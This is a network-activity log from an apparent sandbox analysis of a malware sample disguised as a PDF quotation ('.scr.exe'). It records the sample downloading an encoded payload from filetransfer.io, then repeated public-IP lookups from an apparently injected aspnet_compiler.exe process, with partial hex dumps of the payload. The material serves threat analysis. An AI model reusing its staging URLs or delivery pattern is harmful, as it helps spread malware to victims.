                                                                Nov 21, 2024 13:08:56.703119040 CET192.168.2.51.1.1.10xec52Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:58.622854948 CET192.168.2.51.1.1.10x1b14Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 21, 2024 13:07:59.601717949 CET1.1.1.1192.168.2.50x91cdNo error (0)filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:07:59.601717949 CET1.1.1.1192.168.2.50x91cdNo error (0)filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:03.522113085 CET1.1.1.1192.168.2.50x1a64No error (0)s24.filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:03.522113085 CET1.1.1.1192.168.2.50x1a64No error (0)s24.filetransfer.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:56.990396976 CET1.1.1.1192.168.2.50xec52No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                Nov 21, 2024 13:08:56.990396976 CET1.1.1.1192.168.2.50xec52No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:56.990396976 CET1.1.1.1192.168.2.50xec52No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:56.990396976 CET1.1.1.1192.168.2.50xec52No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:56.990396976 CET1.1.1.1192.168.2.50xec52No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:56.990396976 CET1.1.1.1192.168.2.50xec52No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:58.856762886 CET1.1.1.1192.168.2.50x1b14No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:58.856762886 CET1.1.1.1192.168.2.50x1b14No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                • filetransfer.io
                                                                • s24.filetransfer.io
                                                                • reallyfreegeoip.org
                                                                • checkip.dyndns.org
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549704188.114.96.3802132C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:07:59.739715099 CET95OUTGET /data-package/u7ghXEYp/download HTTP/1.1
                                                                Host: filetransfer.io
                                                                Connection: Keep-Alive
                                                                Nov 21, 2024 13:08:01.047128916 CET998INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 21 Nov 2024 12:08:00 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Location: https://filetransfer.io/data-package/u7ghXEYp/download
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86K66uUr70t84Mpaer7wGq7051D%2FIw4%2BzyP44r5ykbdlIHysCH%2BJrXqQF1Ga2k2lfR5T7dCzRjmO%2FxhH0hV1W6vaeCbhq5Coch1a%2Fq4jC79acL2DRATWzb0cEoNduPccsYs%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e60900c5b628c95-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549806193.122.130.0806176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:08:57.119740009 CET151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Nov 21, 2024 13:08:58.261223078 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:08:58 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: d6fa511f36e442f4bf643ddd1a59270e
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                Nov 21, 2024 13:08:58.266613007 CET127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Nov 21, 2024 13:08:58.595220089 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:08:58 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: bd134e119d260dc91dc7f959ebfabdc0
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                Nov 21, 2024 13:09:00.595020056 CET127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Nov 21, 2024 13:09:02.048403025 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:01 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: dc301dab968120e78fb828f0537b9041
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549825193.122.130.0806176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:09:03.894653082 CET127OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Nov 21, 2024 13:09:05.040397882 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:04 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: e827943a360eaa0f90041d71ea25e715
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.549835193.122.130.0806176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:09:06.881289959 CET151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Nov 21, 2024 13:09:07.977415085 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:07 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 2a517c89b1427fde7f3b7472a807827a
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.549842193.122.130.0806176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:09:09.887140036 CET151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Nov 21, 2024 13:09:10.984077930 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:10 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 962254131a2203390df4c48747a7cb13
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.549850193.122.130.0806176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:09:12.831213951 CET151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Nov 21, 2024 13:09:13.972841024 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:13 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 2d02cc122c82da609ad62c91c8d261c0
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.549860193.122.130.0806176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:09:15.763046026 CET151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Nov 21, 2024 13:09:16.899889946 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: cb429b732c42b6495007c121dd86a3de
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.549868193.122.130.0806176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 21, 2024 13:09:18.811547041 CET151OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                Host: checkip.dyndns.org
                                                                Connection: Keep-Alive
                                                                Nov 21, 2024 13:09:19.974071980 CET320INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:09:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 103
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 335b2893d5f6214bc079430de1419a36
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549705188.114.96.34432132C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:08:02 UTC95OUTGET /data-package/u7ghXEYp/download HTTP/1.1
                                                                Host: filetransfer.io
                                                                Connection: Keep-Alive
                                                                2024-11-21 12:08:03 UTC1241INHTTP/1.1 302 Found
                                                                Date: Thu, 21 Nov 2024 12:08:03 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Powered-By: Nette Framework 3
                                                                X-Frame-Options: SAMEORIGIN
                                                                Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                                Set-Cookie: PHPSESSID=94cu637ud9eh1bp11v7i2pf1l6; expires=Thu, 05-Dec-2024 12:08:02 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                Vary: X-Requested-With
                                                                Location: https://s24.filetransfer.io/storage/download/72vwG3nYeuAb
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GxTSyx1o4AMRupGD4IJ5%2FkE1WJsKoZQLY8PngPWAy1aNmVusRQQ0rqwrqk3H86b%2B1cDG7ZqNYLIBPtbwWboGz9PxV24a3i%2BOw8pQspPgztC7zPCsn3p4xYvE0FB4L1OxNh0%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6090188c1841d8-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1920&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=709&delivery_rate=1509824&cwnd=233&unsent_bytes=0&cid=5b3a85d7284b2135&ts=908&x=0"
                                                                2024-11-21 12:08:03 UTC128INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 34 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 37 32 76 77 47 33 6e 59 65 75 41 62 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e
                                                                Data Ascii: 80<h1>Redirect</h1><p><a href="https://s24.filetransfer.io/storage/download/72vwG3nYeuAb">Please click here to continue</a>.
                                                                2024-11-21 12:08:03 UTC6INData Raw: 3c 2f 70 3e 0d 0a
                                                                Data Ascii: </p>
                                                                2024-11-21 12:08:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549706188.114.96.34432132C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-21 12:08:04 UTC98OUTGET /storage/download/72vwG3nYeuAb HTTP/1.1
                                                                Host: s24.filetransfer.io
                                                                Connection: Keep-Alive
                                                                2024-11-21 12:08:10 UTC1247INHTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 12:08:09 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 1072640
                                                                Connection: close
                                                                Last-Modified: Thu, 21 Nov 2024 07:42:13 GMT
                                                                Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                                Set-Cookie: PHPSESSID=d09fa9d1957db051fd2670631a84bfb9; expires=Thu, 05-Dec-2024 12:08:08 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Content-Disposition: attachment; filename="Yyuirabaeaw.dat"
                                                                Accept-Ranges: bytes
                                                                Accept-Ranges: bytes
                                                                ETag: "673ee455-105e00"
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOXqVsSVRi7GcRc2qHyGdyrhi23G7OReDe0WQ%2FE3%2BxFgVsPbzK2DIkQLgiIfQAsatvf0OI8pSxZENmRKdxUbmekZlbM2MivcfTpVOO9o25ieADzA8TkGfR4VEu%2FpVbdheTetyppa"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e6090281e2d8c7b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1921&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=712&delivery_rate=1474747&cwnd=184&unsent_bytes=0&cid=692ab778f91987d2&ts=5212&x=0"
                                                                2024-11-21 12:08:10 UTC122INData Raw: 7f 63 a0 32 3a 30 32 39 34 32 39 30 cd c6 30 32 81 30 32 39 30 32 39 30 72 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 b2 39 30 32 37 2f 88 37 30 86 30 fd 13 81 31 7e f4 11 66 51 59 41 19 40 40 56 57 40 58 5d 12 5a 51 5c 57 5f 46 19 52 57 19 42 47 57 10 5b 57 10 76 76 63 12 54 5f 56 5c 1e 3f 34 3a 16 39
                                                                Data Ascii: c2:0294290020290290r902902902902902902902902902902902909027/7001~fQYA@@VW@X]ZQ\W_FRWBGW[WvvcT_V\?4:9
                                                                2024-11-21 12:08:10 UTC1369INData Raw: 30 32 39 30 32 39 60 77 39 30 7e 38 33 32 b8 52 92 8d 30 32 39 30 32 39 30 32 d9 30 3c 18 3b 33 09 30 32 6f 20 32 39 36 32 39 30 32 39 30 7c 4d 20 32 39 10 32 39 30 b2 29 30 32 39 70 32 39 10 32 39 30 30 39 30 36 39 30 32 39 30 32 39 34 32 39 30 32 39 30 32 39 f0 22 39 30 30 39 30 32 39 30 32 3a 30 72 bc 30 32 29 30 32 29 30 32 39 30 22 39 30 22 39 30 32 39 30 32 36 30 32 39 30 32 39 30 32 39 30 32 39 44 22 39 7b 32 39 30 32 b9 20 32 15 33 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 99 20 32 35 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 32 39 30 12 39 30 3a 39 30 32 39 30 32 39 30 32 39 30 3a 19 30 32 71 30 32 39 30 32 39 30 32 39 30 32 17
                                                                Data Ascii: 029029`w90~832R029029020<;302o 296290290|M 29290)029p2929009069029029429029029"900902902:0r02)02)0290"90"9029026029029029029D"9{2902 232902902902902902902 25029029029029029029029029029029029029029029029029029090:90290290290:02q02902902902
                                                                2024-11-21 12:08:10 UTC1369INData Raw: 32 3a 00 3a 39 34 32 39 30 32 39 30 32 39 30 25 13 71 2e 39 30 32 39 30 32 01 30 32 39 51 31 39 30 ab 3a 30 32 00 30 32 39 27 32 39 31 31 09 38 32 3d 30 32 39 30 32 39 30 32 39 27 18 78 2c 32 39 30 32 39 30 4e 39 30 32 9d 31 32 39 10 30 39 30 0b 39 30 32 2e 30 32 38 23 02 3d 30 36 39 30 32 39 30 32 39 30 32 2e 1a 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 30 18 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3a 30 b2 39 30 32 38 30 32 28 18 fa 3b 30 34 19 32 32 39 30 cc 37 30 32 01 30 32 39 30 cc 35 30 32 7c 33 32 39 30 1c 39 30 32 16 30 32 39 35 32 39 30 0a 10 30 32 39 4e 4d 3b 30 36 11 45 35 39 36 12 38 30 32 39 4e 3f 3b 30 36 42 3a 30 39 34 08 f5 cf cd c6 16 12 38 30 32 39 08 f3 c6 cf cd 13 4e b2 3b 30 36 11 49 35 39 36 12 39 30 32 39 4e 3f 3b 30
                                                                Data Ascii: 2::94290290290%q.902902029Q190:02029'291182=029029029'x,290290N902129090902.028#=06902902902.!32=0290290290*1942902902902#:0902802(;0422907020290502|32909020295290029NM;06E5968029N?;06B:0948029N;06I5969029N?;0
                                                                2024-11-21 12:08:10 UTC1369INData Raw: 2b 30 32 2e 1a 32 39 30 20 39 30 26 13 30 32 39 5a 1a f1 32 32 3f 4e 4d 3b 30 36 11 45 35 39 36 4c b9 32 32 3d 18 4b 3e 30 34 13 30 58 11 f8 30 39 36 4c 46 32 32 3d 18 47 3e 30 34 47 b0 30 39 34 1a 40 37 32 3f 1a 32 53 18 fa 3b 30 34 47 4f 30 39 34 1a 4c 37 32 3f 4e b2 3b 30 36 11 49 35 39 36 18 39 5a 1a f1 32 32 3f 4e 4d 3b 30 36 11 45 35 39 36 4c b9 32 32 3d 18 4b 3e 30 34 13 30 58 11 f8 30 39 36 4c 46 32 32 3d 18 47 3e 30 34 47 b0 30 39 34 1a 40 37 32 3f 1a 32 53 18 fa 3b 30 34 47 4f 30 39 34 1a 4c 37 32 3f 4e b2 3b 30 36 11 49 35 39 36 18 39 5a 1a f1 32 32 3f 4e 4d 3b 30 36 11 45 35 39 36 4c b9 32 32 3d 18 4b 3e 30 34 13 30 58 11 f8 30 39 36 4c 46 32 32 3d 18 47 3e 30 34 47 b0 30 39 34 1a 40 37 32 3f 1a 32 53 18 fa 3b 30 34 47 4f 30 39 34 1a 4c 37 32
                                                                Data Ascii: +02.290 90&029Z22?NM;06E596L22=K>040X096LF22=G>04G094@72?2S;04GO094L72?N;06I5969Z22?NM;06E596L22=K>040X096LF22=G>04G094@72?2S;04GO094L72?N;06I5969Z22?NM;06E596L22=K>040X096LF22=G>04G094@72?2S;04GO094L72
                                                                2024-11-21 12:08:10 UTC1369INData Raw: 30 32 01 a7 cd c6 cf 20 39 30 24 13 30 32 39 22 32 39 24 18 39 30 32 2b 30 32 2e 1a 32 39 30 20 39 30 25 13 30 32 39 22 32 39 24 18 39 30 32 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3d 30 36 39 30 32 39 30 32 39 30 32 2d 1a 21 09 33 32 3d 30 32 39 30 32 39 30 32 39 24 18 2a 00 31 39 34 32 39 30 32 39 30 32 39 30 32 13 23 02 3c 30 36 39 30 32 39 30 32 39 30 32 2d 1a 21 09 33 32 b9 30 32 39 31 32 39 21 1a f1 32 32 3f 10 30 39 30 32 c7 3e 32 39 08 32 39 30 32 c7 3c 32 39 75 31 39 30 32 6e 30 32 39 35 32 39 30 1c 39 30 32 01 62 32 39 30 4c b9 32 32 3d 18 4b 3e 30 34 19 30 32 39 30 4c 34 32 32 3d 4b 56 3b 30 36 03 fc cd c6 cf 14 19 30 32 39 30 0a f8 cf cd c6 4e 4d 3b 30 36 11 45 35 39 36 12 38 30 32 39 4e 3f 3b 30 36 42 39 30 39 34 08 9a cf cd c6
                                                                Data Ascii: 02 90$029"29$902+02.290 90%029"29$902*1942902902902#=06902902902-!32=029029029$*1942902902902#<06902902902-!32029129!22?0902>292902<29u1902n0295290902b290L22=K>040290L422=KV;060290NM;06E5968029N?;06B9094
